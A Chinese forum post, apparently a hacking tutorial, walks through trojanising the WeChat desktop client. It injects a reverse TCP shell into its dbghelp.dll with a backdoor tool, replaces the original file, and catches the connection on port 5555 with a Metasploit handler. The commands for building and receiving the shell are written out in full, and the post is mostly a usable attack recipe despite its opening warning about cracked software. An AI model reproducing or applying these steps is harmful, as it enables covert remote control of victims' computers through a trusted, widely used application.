找回密码
 注册

QQ登录

只需一步,快速开始

写在前面
通常情况下,我们会常常到网络中下载一些破解版的软件进行使用。在方便的时候也给我们带来了很多的网络安全隐患。今天我们来看看,攻击者是如何进行利用正常软件进行网络攻击的。
准备

运行Process Explorer查看微信运行时所有调用的文件
可以看到微信调用了很多他的配置文件,那么,我们能不能从他的配置文件下手呢?
我们定位到我们微信的安装目录C:\Program Files (x86)\Tencent\WeChat

既然微信调用了.dll的配置文件,我们可不可以将后门放到其配置文件中,运行微信后,微信会调用我们的配置文件。这样我们的后门也就启动了。
OK!既然如此,我们给其配置文件添加后门!这里我们以dbghelp.dll文件为列!这个因为是微信的帮助文件,当然我也试了下其他文件,当我们注入后门时,微信无法打开,估计是核心文件,一旦破坏就不能使用,但是像帮助文档的文件,即使破坏微信又能使用。

利用backdoor添加后门
python backdoor.py -f /root/msf/wx/dbghelp.dll  -s reverse_shell_tcp_inline -P 5555 -H 192.168.123.231

填坑时间:
kali默认安装了backdoor但是在生成的时候报错,不知道是那个的问题,我们从github下载最新的文件,直接执行上述命令即可。
-P:填写你的端口
-H:填写你的ip地址(可以是内网也可以是外网)

这里我们选择2选项,其他选项我们尝试,大家可以试试!
后门会生成在backdoored文件下

我们替换掉微信中的源文件(最好将源文件备份)


配置msfconsole

分别执行下面命令
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LPORT 5555
set lhost 192.168.123.231
exploit

启动微信后,我们成功获得系统shell



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴

1 个回复

倒序浏览
libo vip用户 2019-6-26 23:01:18
2#
学习了,感谢大佬
有没有参加CTF比赛的,一起组队啊!
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 注册